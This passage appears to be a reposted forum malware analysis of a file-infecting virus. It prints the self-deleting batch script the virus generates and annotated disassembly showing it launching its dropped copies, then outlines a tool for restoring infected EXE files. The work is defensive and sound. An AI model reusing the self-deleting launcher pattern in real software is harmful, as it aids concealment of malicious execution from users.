if exist "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe" goto try1
ren "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe.exe" "MdnPacker.exe"
if exist "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe.exe" goto try2
"C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe"
:try2
del "C:\DOCUME~1\huyuytyt\LOCALS~1\Temp\$$a35.bat"

So it tries to delete itself, renames the generated file back, then runs it, and finally deletes the batch file itself.

00408272 E8 81C6FFFF    call 004048F8                  ; write the generated content into the batch file
00408277 57             push edi
00408278 E8 BFBFFFFF    call 0040423C                  ; jmp to kernel32.CloseHandle
..............
004082D9 50             push eax
004082DA 6A 00          push 0
004082DC 6A 20          push 20
004082DE 6A FF          push -1
004082E0 6A 00          push 0
004082E2 6A 00          push 0
004082E4 8B45 E8        mov eax, dword ptr [ebp-18]
004082E7 E8 1CB2FFFF    call 00403508
004082EC 50             push eax
004082ED 6A 00          push 0
004082EF E8 78BFFFFF    call 0040426C                  ; jmp to kernel32.CreateProcessA // run this batch file
...........
0040830E E8 C1600000    call 0040E3D4
{
..........
0040E41B 50             push eax
0040E41C 6A 00          push 0
0040E41E 6A 00          push 0
0040E420 6A 20          push 20
0040E422 6A FF          push -1
0040E424 6A 00          push 0
0040E426 6A 00          push 0
0040E428 8B45 FC        mov eax, dword ptr [ebp-4]
0040E42B E8 D850FFFF    call 00403508
0040E430 50             push eax
0040E431 6A 00          push 0
0040E433 E8 345EFFFF    call 0040426C                  ; jmp to kernel32.CreateProcessA // run Logo1_.exe
}

At this point the virus is basically analysed... Now we know that Logo1_.exe and rundl132.exe are the same program; both are written out from the first E501 bytes of the infected program.

Below is my idea for writing a tool to recover infected programs:
1. Find all EXE files
2. Move the file pointer to E501h, read (file size - E501) bytes, and write them into the file "original name + .exe"
3. Delete the original program
4. Rename "original name + .exe" back to "original name"
Author:
ming600
Time:
2007-2-3 20:41
Title:
[Repost] Virus Analysis Diary (1)
You're quite expert at decryption too, impressive.
Welcome to 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2